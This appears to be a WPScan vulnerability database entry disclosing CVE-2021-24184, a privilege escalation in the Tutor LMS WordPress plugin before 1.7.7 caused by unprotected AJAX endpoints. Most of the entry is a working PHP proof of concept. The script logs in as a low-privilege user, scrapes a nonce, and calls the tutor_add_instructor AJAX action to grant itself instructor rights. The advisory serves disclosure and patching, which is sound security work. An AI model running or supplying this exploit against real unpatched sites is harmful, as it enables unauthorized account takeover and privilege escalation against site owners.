logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Tutor LMS < 1.7.7 - Unprotected AJAX including Privilege Escalation

Description

Several AJAX endpoints in the plugin were unprotected, allowing students to modify course information and elevate their privileges among many other actions.

Proof of Concept

Only one PoC provided for privilege escalation. 

<?php

// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

// 1) Log in as customer
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/index.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/var\stutor_data\s=\s{"delete_confirm_text"\:"Are you sure\?\sit\scan\snot\sbe\sundone\."\,"nonce_key"\:"_wpnonce","_wpnonce":"([^"]+)"/', $content, $matches);
$nonce = $matches[1];
print_r($nonce);

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'first_name' => 'Instructor',
    'last_name' => 'Instructor',
    'user_login' => 'Instructor',
    'email' => '[email protected]',
    'phone_number' => '1234567890',
    'password' => 'test',
    'password_confirmation' => 'test',
    'tutor_profile_bio' => '',
    'action' => 'tutor_add_instructor',
    '_wpnonce' => $nonce
]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

Affects Plugins

tutor

Fixed in version 1.7.7

References

CVE

CVE-2021-24184

URL

https://www.wordfence.com/blog/2021/03/several-vulnerabilities-patched-in-tutor-lms-plugin/

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-269

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website

https://wordfence.com

Submitter twitter

infosecchloe

Verified

Yes

WPVDB ID

5e85917c-7a58-49cb-b8b3-05aa18ffff3e

Timeline

Publicly Published

2021-03-15 (about 4 months ago)

Added

2021-03-15 (about 4 months ago)

Last Updated

2021-03-20 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin